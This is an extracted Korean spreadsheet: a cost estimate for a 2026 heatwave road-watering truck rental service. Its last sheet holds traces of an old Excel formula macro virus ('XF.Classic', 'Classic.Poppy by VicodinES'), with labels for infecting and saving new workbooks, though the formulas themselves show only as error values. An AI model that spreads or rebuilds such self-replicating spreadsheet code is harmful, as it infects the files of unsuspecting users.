Workbook
Name _SBB1: #REF!
Name _SBB1: #REF!
Name _SBB2: #REF!
Name _SBB2: #REF!
Name _SBB3: #REF!
Name _SBB3: #REF!
Name _SBB4: #REF!
Name _SBB4: #REF!
Name _SBB5: #REF!
Name _SBB5: #REF!
Name _SHH1: #REF!
Name _SHH1: #REF!
Name _SHH2: #REF!
Name _SHH2: #REF!
Name _SHH3: #REF!
Name _SHH3: #REF!
Name _XX6: #REF!
Name _XX6: #REF!
Name _XX7: #REF!
Name _XX7: #REF!
Name A: #REF!
Name A: #REF!
Name ar: #REF!
Name ar: #REF!
Name B1B: #REF!
Name B1B: #REF!
Name B2B: #REF!
Name B2B: #REF!
Name B3B: #REF!
Name B3B: #REF!
Name B4B: #REF!
Name B4B: #REF!
Name bs_chekjum: #REF!
Name bs_chekjum: #REF!
Name bs_chekplus: #REF!
Name bs_chekplus: #REF!
Name bs_chekwave: #REF!
Name bs_chekwave: #REF!
Name CK: #REF!
Name CK: #REF!
Name COLUMN_A: #REF!
Name COLUMN_A: #REF!
Name CY: #REF!
Name CY: #REF!
Name d: #REF!
Name d: #REF!
Name DIA: #REF!
Name DIA: #REF!
Name Ec: #REF!
Name Ec: #REF!
Name Ec3Span: #REF!
Name Ec3Span: #REF!
Name Epc: #REF!
Name Epc: #REF!
Name Epc3Span: #REF!
Name Epc3Span: #REF!
Name Eslab: #REF!
Name Eslab: #REF!
Name Fci: #REF!
Name Fci: #REF!

Sheet 000000

Sheet 갑지
A1: 과 장 | E1: 심사자 | H1: 설계자 | K1: 설 계 | M1: 2026년 7월 일 | O1: 결 재
K2: 심 사 | M2: 2026년 7월 일 | O2: 월 일
A4: 설 계 내 역 서 ( 총 차 )
B7: ▣ 용 역 명 : 2026년 폭염대응 도로살수 임차 용역
B9: 구 분 | F9: 금 액 | N9: 비 고
B10: 총 용 역 비 | F10: ='총괄내역서(원가계산)'!L24 -> 39000000 | I10: =F10 -> 39000000
B11: 용 역 비 | D11: 공 급 가 액 | F11: ='총괄내역서(원가계산)'!L16 -> 35454550 | I11: =F11 -> 35454550
D12: 부 가 가 치 세 | F12: ='총괄내역서(원가계산)'!L17 -> 3545450 | I12: =F12 -> 3545450
D13: 계 | F13: ='총괄내역서(원가계산)'!L24 -> 39000000 | I13: =F13 -> 39000000
B15: ※ 용 역 개 요
B16: □ | C16: 폭염대응기간 : | E16: ~ 2026. 9. 30. (폭염특보 발령시 살수)
B17: □ | C17: 투입장비 및 인력 : 살수차량(16톤급) 임차(운전원포함) 2대 x 30일

Sheet 총괄내역서(원가계산)
A1: 총 괄 내 역 서 ( 총 차 )
A2: =갑지!B7 -> ▣ 용 역 명 : 2026년 폭염대응 도로살수 임차 용역
A3: 명 칭 | B3: 규 격 | C3: 단위 | D3: 수량 | E3: 재 료 비 | G3: 노 무 비 | I3: 경 비 | K3: 합 계 | M3: 비고
E4: 단 가 | F4: 금 액 | G4: 단 가 | H4: 금 액 | I4: 단 가 | J4: 금 액 | K4: 단 가 | L4: 금 액
A5: 1. 도로살수작업 | B5: 살수차16톤/운전원포함 | C5: 일 | D5: =내역서!C7 -> 60 | E5: =내역서!E24 -> 168309.11 | F5: =내역서!F24 -> 10098546 | G5: =내역서!G24 -> 238936 | H5: =내역서!H24 -> 14336160 | I5: =내역서!I24 -> 153232 | J5: =내역서!J24 -> 9193920 | K5: =내역서!K24 -> 560477.11 | L5: =F5+H5+J5 -> 33628626
A6: 순공사비원가 | F6: =F5 -> 10098546 | H6: =H5 -> 14336160 | J6: =J5 -> 9193920 | L6: =F6+H6+J6 -> 33628626
A7: 2.산재보험료 | C7: 1 | D7: 식 | L7: 0
A8: 3.고용보험료 | C8: 1 | D8: 식 | L8: 0
A9: 4.건강보험료 | C9: 1 | D9: 식 | L9: 0
A10: 5.연금보험료 | C10: 1 | D10: 식 | L10: 0
A11: 6.노인장기요양보험료 | C11: 1 | D11: 식 | L11: 0
A12: 7.산업안전보건관리비 | C12: 1 | D12: 식 | E12: (재료비+직접노무비)×3.15%
A13: 순공사비원가 | L13: =INT(SUM(L6:L12)) -> 33628626
A14: 2. 일반관리비 | C14: 식 | D14: 1 | E14: 순공사비원가*5% | L14: =INT(L13*5%) -> 1681431
A15: 3. 이 윤 | C15: 식 | D15: 1 | E15: (순공사비원가+일반관리비-재료비)*0.57% | L15: =INT(((L13+L14)-F6)*0.573127%) -> 144493
A16: 공 급 가 액 | L16: =INT(SUM(L13:L15)) -> 35454550
A17: 4. 부 가 가 치 세 | C17: 식 | D17: 1 | E17: (공급가액의 10%) | L17: =ROUNDDOWN(INT(L16*10%),-1) -> 3545450
A24: 도급비 | L24: =L16+L17 -> 39000000

Sheet 내역서
A1: 내 역 서
A2: =갑지!B7 -> ▣ 용 역 명 : 2026년 폭염대응 도로살수 임차 용역
A4: 명 칭 | B4: 규 격 | C4: 수량 | D4: 단위 | E4: 재 료 비 | G4: 노 무 비 | I4: 경 비 | K4: 합 계 | M4: 비고 | O4: 85.3
E5: 단 가 | F5: 금 액 | G5: 단 가 | H5: 금 액 | I5: 단 가 | J5: 금 액 | K5: 단 가 | L5: 금 액
A6: 1. 살수차 임대 및 운행
A7: 운전원 | C7: =수량산출!C6 -> 60 | D7: 일 | F7: =INT(C7*E7) -> 0 | G7: =일위대가!$G$9 -> 238936 | H7: =INT(C7*G7) -> 14336160 | J7: =INT(I7*C7) -> 0 | K7: =E7+G7+I7 -> 238936 | L7: =F7+H7+J7 -> 14336160
A8: 살수차(16톤) | C8: =수량산출!C7 -> 60 | D8: 일 | E8: =일위대가!F7 -> 168309.11 | F8: =INT(C8*E8) -> 10098546 | H8: =INT(C8*G8) -> 0 | I8: =일위대가!J7 -> 153232 | J8: =INT(I8*C8) -> 9193920 | K8: =E8+G8+I8 -> 321541.11 | L8: =F8+H8+J8 -> 19292466
A9: 소계 | F9: =SUM(F7:F8) -> 10098546 | H9: =SUM(H7:H8) -> 14336160 | J9: =SUM(J7:J8) -> 9193920 | K9: =SUM(K7:K8) -> 560477.11 | L9: =SUM(L7:L8) -> 33628626
A24: 합계 | E24: =E8 -> 168309.11 | F24: =F9 -> 10098546 | G24: =G7 -> 238936 | H24: =H9 -> 14336160 | I24: =I8 -> 153232 | J24: =J9 -> 9193920 | K24: =K9 -> 560477.11 | L24: =L9 -> 33628626

Sheet 수량산출
A1: 수량산출서
A2: =갑지!B7 -> ▣ 용 역 명 : 2026년 폭염대응 도로살수 임차 용역
A3: ▣ 작업기간: ~2026.9.30. (폭염특보 발령시)
A4: 품 종 | B4: 규 격 | C4: 계 | D4: 단위 | E4: 상시 단계 | F4: 작업 단계 | G4: 비 고
A6: 살수차 임차 | C6: 60 | D6: 일 | G6: 2대 * 30일
A7: 화물차 운전사 | C7: 60 | D7: 일 | G7: 2명 * 30일

Sheet 일위대가
A1: 일 위 대 가 표
A2: ='총괄내역서(원가계산)'!A2 -> ▣ 용 역 명 : 2026년 폭염대응 도로살수 임차 용역
A3: 공 종 | B3: 규 격 | C3: 수 량 | D3: 단위 | E3: 재 료 비 | G3: 노 무 비 | I3: 경 비 | K3: 합 계 | L3: 비 고
E4: 단 가 | F4: 금 액 | G4: 단 가 | H4: 금 액 | I4: 단 가 | J4: 금 액
A5: 제 1 호표 살수차 임대료(일/대)
A6: 살수차 16톤 | B6: 8시간/1일 | C6: 8 | D6: 시간 | E6: =중기단가!F9 -> 21038.638 | F6: =E6*8 -> 168309.11 | G6: =노무비산출!I1 -> 0 | H6: =G6*8 -> 0 | I6: =중기단가!F6 -> 19154 | J6: =I6*8 -> 153232 | K6: =F6+H6+J6 -> 321541.11
A7: 계 | F7: =F6 -> 168309.11 | H7: =H6 -> 0 | J7: =J6 -> 153232 | K7: =F7+H7+J7 -> 321541.11
A8: 제 2 호표 화물차 운전사(일/인)
A9: 화물차운전사 | C9: 1 | D9: 일 | G9: =노무비산출!G4 -> 238936 | H9: =G9 -> 238936 | K9: =F9+H9+J9 -> 238936
A10: 계 | H10: =H9 -> 238936 | K10: =F10+H10+J10 -> 238936

Sheet 물가조사
A1: 물 가 조 사
F2: 조사기간 : 2025.07.06.~12.
A3: ■ 자재단가 적용범위 : 2025년 07월2째주 한국석유공사(오피넷)
A4: ○ 상기에 공시되지 않은 단가는 시중단가 및 견적단가 적용
A5: 품 명 | B5: 규 격 | C5: 단위 | D5: 한국석유공사(부가세 포함) | H5: 적용(부가가치세 제외) | I5: 비고 | J5: 설계단가 | K5: 심사단가
A6: 경 유 | C6: ℓ | D6: 1,893.83원(2025.7.3째주 서울주유소평균가격) | H6: =1893.83/1.1 -> 1721.6636

Sheet 노무비산출
A1: 노 무 비
J2: 2026. 상반기 노임 적용
A3: 구 분 | C3: 노임 | D3: 휴지계수 | F3: 계 | G3: 적용단가(일) | I3: 적용단가(시간)
A4: 화물차운전사 | B4: 주간 | C4: 238936 | D4: 25 | E4: 20 | F4: =C4 -> 238936 | G4: 238936 | H4: 원/일 | I4: =INT(G4/8) -> 29867 | J4: 원/hr

Sheet 중기단가
A1: 중 기 단 가
A4: ㅇ살수차(16톤) -------
A5: 구 분 | C5: 장비가격 | D5: 계수및단가 | E5: 지수 | F5: 금액
A6: ▷경비 | B6: 살수차(16톤) | C6: 90649 | F6: 19154 | G6: 원/hr
A7: ▷재료비 | B7: 저유황경유 | C7: ℓ | D7: 9.4 | E7: =물가조사!H6 -> 1721.6636 | F7: =D7*E7 -> 16183.638 | G7: 원/hr
B8: 잡품기타 | C8: 주연료의30% | D8: 0.3 | E8: =F7 -> 16183.638 | F8: =INT(D8*E8) -> 4855 | G8: 원/hr
A9: 재료비 소계 | F9: =SUM(F7:F8) -> 21038.638 | G9: 원/hr
A10: 총계 | F10: =SUM(F6:F8) -> 40192.638 | G10: 원/hr

Sheet --------
A1: 2007년 씨링공법 일위대가표- 1(0,2~10).xls | C1: FALSE
A2: Book1
A3: C:\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: #N/A | C4: FALSE
C5: #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: =#N/A -> #N/A | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: =#N/A -> #N/A
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
...
